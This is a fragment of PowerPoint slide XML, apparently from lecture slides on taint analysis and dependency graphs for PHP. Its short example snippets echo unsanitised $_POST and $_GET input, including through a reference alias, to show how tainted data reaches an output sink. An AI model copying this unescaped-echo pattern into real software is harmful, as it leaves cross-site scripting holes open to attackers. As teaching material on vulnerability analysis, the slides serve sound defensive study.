            <a:off x="8028384" y="278092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 smtClean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 smtClean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35" name="矩形 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5940152" y="278092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6" name="矩形 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5940152" y="170080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7" name="矩形 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4067944" y="2708920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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Untainted</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77" name="圖案 76"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="82" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4373852" y="2258996"/>
            <a:ext cx="1368152" cy="2268000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst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82" name="橢圓 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292080" y="4077072"/>
            <a:ext cx="2160240" cy="504056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dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str_concat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, 10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86" name="肘形接點 85"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6480264" y="2708972"/>
            <a:ext cx="1368200" cy="1368000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst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02" name="直線單箭頭接點 101"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="82" idx="4"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6012160" y="4941168"/>
            <a:ext cx="720080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106" name="矩形 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588224" y="5805264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 smtClean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 smtClean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68" name="矩形 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588224" y="4653136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 smtClean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 smtClean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38" name="矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="1268760"/>
            <a:ext cx="2952328" cy="72008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02:  $id = $_POST["id"]; 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03:  $dept = $_POST["dept"];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9" name="矩形 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="4725224"/>
            <a:ext cx="2952328" cy="720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10:  echo "Hello! </a:t>
            </a:r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".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$id;</a:t>
            </a:r>
          </a:p>
          <a:p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11:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>displayManagementFun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();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="文字方塊 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="4283804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True</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="文字方塊 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="305966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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="橢圓 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1259632" y="5805264"/>
            <a:ext cx="1224136" cy="576064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Exit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4" name="直線單箭頭接點 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="2"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1691680" y="5625244"/>
            <a:ext cx="360040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45" name="六邊形 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223628" y="2348880"/>
            <a:ext cx="1296144" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 40629"/>
              <a:gd name="vf" fmla="val 115470"/>
            </a:avLst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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$dept == 0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk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7" name="六邊形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1007604" y="3537088"/>
            <a:ext cx="1728192" cy="648000"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 40629"/>
              <a:gd name="vf" fmla="val 115470"/>
            </a:avLst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$id == "admin"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52" name="直線單箭頭接點 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1691283" y="2168463"/>
            <a:ext cx="360040" cy="794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54" name="直線單箭頭接點 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1619275" y="3249377"/>
            <a:ext cx="503262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55" name="直線單箭頭接點 54"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="39" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1605565" y="4459088"/>
            <a:ext cx="531477" cy="794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40" name="文字方塊 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971728" y="6165304"/>
            <a:ext cx="6049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Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note: a better analysis would take into account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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$id == “admin”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.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27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="106" grpId="0"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="41" grpId="0"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="45" grpId="0" animBg="1"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="4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Dependency Graph (3/3)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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5796136" y="5661248"/>
            <a:ext cx="1296144" cy="432048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echo, 14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3203848" y="2276872"/>
            <a:ext cx="1584176" cy="432048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Hello! </a:t>
            </a:r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, 14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" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7416316" y="2276872"/>
            <a:ext cx="1008112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$id , 2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8" name="矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7020272" y="1196752"/>
            <a:ext cx="1800200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$_POST[</a:t>
            </a:r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id</a:t>
            </a:r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], 2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9" name="矩形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4860032" y="1196752"/>
            <a:ext cx="2088232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$_POST[</a:t>
            </a:r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dept</a:t>
            </a:r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], 3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" name="矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5328084" y="2276872"/>
            <a:ext cx="1152128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$dept, 3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31" name="直線單箭頭接點 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5580088" y="1952812"/>
            <a:ext cx="648120" cy="1588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直線單箭頭接點 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="2"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7596312" y="1952812"/>
            <a:ext cx="648120" cy="1588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矩形 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8100392" y="170080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 smtClean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 smtClean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34" name="矩形 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8100392" y="278092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 smtClean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 smtClean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35" name="矩形 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6012160" y="278092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6" name="矩形 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6012160" y="170080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7" name="矩形 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4139952" y="2708920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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Untainted</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF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46" name="橢圓 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4067944" y="3356992"/>
            <a:ext cx="2160240" cy="504056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dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str_concat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, 14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51" name="肘形接點 50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5274054" y="2726898"/>
            <a:ext cx="648120" cy="612068"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 69535"/>
            </a:avLst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圖案 76"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="46" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4247964" y="2456892"/>
            <a:ext cx="648072" cy="1152128"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 69537"/>
            </a:avLst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橢圓 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364088" y="4725144"/>
            <a:ext cx="2160240" cy="504056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dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str_concat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, 14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84" name="肘形接點 83"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="4"/>
            <a:endCxn id="82" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5364088" y="3645024"/>
            <a:ext cx="864096" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst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肘形接點 85"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6246162" y="3050934"/>
            <a:ext cx="2016272" cy="1332148"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 77909"/>
            </a:avLst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5" name="矩形 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364088" y="386104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102" name="直線單箭頭接點 101"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="82" idx="4"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6228184" y="5445224"/>
            <a:ext cx="432048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106" name="矩形 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444208" y="5229200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107" name="矩形 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444208" y="6165304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0" name="矩形 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="1268760"/>
            <a:ext cx="2952328" cy="72008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02:  $id = $_POST["id"]; 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03:  $dept = $_POST["dept"];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1" name="矩形 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="4725224"/>
            <a:ext cx="2952328" cy="720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14:  echo "Hello! ".$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dept.$id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;</a:t>
            </a:r>
          </a:p>
          <a:p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15:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>displayBasicFun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();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="文字方塊 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="4283804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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文字方塊 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="305966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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="橢圓 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1259632" y="5805264"/>
            <a:ext cx="1224136" cy="576064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Exit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5" name="直線單箭頭接點 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="41" idx="2"/>
            <a:endCxn id="44" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1691680" y="5625244"/>
            <a:ext cx="360040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47" name="六邊形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223628" y="2348880"/>
            <a:ext cx="1296144" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 40629"/>
              <a:gd name="vf" fmla="val 115470"/>
            </a:avLst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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$dept == 0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk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8" name="六邊形 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1007604" y="3537088"/>
            <a:ext cx="1728192" cy="648000"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 40629"/>
              <a:gd name="vf" fmla="val 115470"/>
            </a:avLst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$id == "admin"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49" name="直線單箭頭接點 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1691283" y="2168463"/>
            <a:ext cx="360040" cy="794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50" name="直線單箭頭接點 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1619275" y="3249377"/>
            <a:ext cx="503262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52" name="直線單箭頭接點 51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1605565" y="4459088"/>
            <a:ext cx="531477" cy="794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27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="46" grpId="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="95" grpId="0"/>
      <p:bldP spid="106" grpId="0"/>
      <p:bldP spid="107" grpId="0"/>
      <p:bldP spid="40" grpId="0" animBg="1"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="4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 bwMode="auto">
          <a:xfrm>
            <a:off x="4499992" y="1484784"/>
            <a:ext cx="3960440" cy="3528392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u="sng" dirty="0" smtClean="0"/>
              <a:t>Dependency Graph</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="18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" name="標題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Alias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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="群組 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="611560" y="1484784"/>
            <a:ext cx="3492388" cy="2160240"/>
            <a:chOff x="467544" y="1196752"/>
            <a:chExt cx="3492388" cy="2160240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文字方塊 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="467544" y="1196752"/>
              <a:ext cx="1403100" cy="369332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TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>PHP code</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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8" name="矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="467544" y="1556792"/>
              <a:ext cx="3492388" cy="1800200"/>
            </a:xfrm>
            <a:prstGeom prst="rect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01  &lt;?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p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02        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>a = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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"message"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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 </a:t>
              </a:r>
            </a:p>
            <a:p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03        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$b = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$a; </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p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04        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$a= $_GET[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>msg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>]; </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900"/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05        echo $b;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900"/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06  ?&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6300192" y="2132856"/>
            <a:ext cx="1800200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$_GET[</a:t>
            </a:r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 err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r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 smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>], 4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6696236" y="3069008"/>
            <a:ext cx="1008112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$a, 4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矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5184068" y="3069008"/>
            <a:ext cx="1008112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$b, 3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" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5148064" y="4077120"/>
            <a:ext cx="1080120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echo, 5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24" name="直線單箭頭接點 23"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
